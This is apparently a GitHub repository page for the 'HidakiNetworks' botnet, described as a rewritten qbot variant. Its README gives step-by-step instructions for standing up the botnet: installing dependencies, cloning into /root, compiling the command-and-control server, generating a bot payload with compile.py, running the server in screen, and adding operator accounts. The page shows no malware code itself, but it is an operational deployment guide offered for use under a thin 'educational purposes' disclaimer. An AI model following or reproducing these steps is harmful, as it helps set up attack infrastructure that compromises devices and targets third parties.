Skip to content

This is a HidakiNetworks botnet source (first version with old methods). Hidaki botnet is a rewritten mortem qbot. Use this sources only for educational purposes!!

shittzuka/hidaki

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

HidakiNetworks

this is a source of HidakiNetworks botnet
Tested on Debian 10, 11 and Ubuntu 18.04, 20.04

Connecting to cnc

You must connect using raw connection type (putty)

Installing

Guide for Ubuntu/Debian
Installing dependencies

apt update && apt upgrade -y
apt install libbz2-1.0 libc6 liblzma5 perl zlib1g bzip2 python2 python -y
apt install nano screen gcc wget libzip-dev unzip git apache2 -y

Copy sources
You must put sources into the /root directory!!

cd /root
git clone https://github.com/shittzuka/hidaki.git
mv hidaki/* /root
rm README.md

Building sources

gcc server.c -o srv -pthread
python2 compile.py

You will get payload from compile.py

Starting cnc

chmod 777 *
screen ./srv 4258 1 <cnc port here>

Adding users

For adding user, you must add a string in users/login.txt.
Example: root shittzukamygod admin 9999 3 10 99/99/9999

Credits

HidakiTeam - Created botnet
sh!ttzuka - Added sources on Git ;D

About

This is a HidakiNetworks botnet source (first version with old methods). Hidaki botnet is a rewritten mortem qbot. Use this sources only for educational purposes!!

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published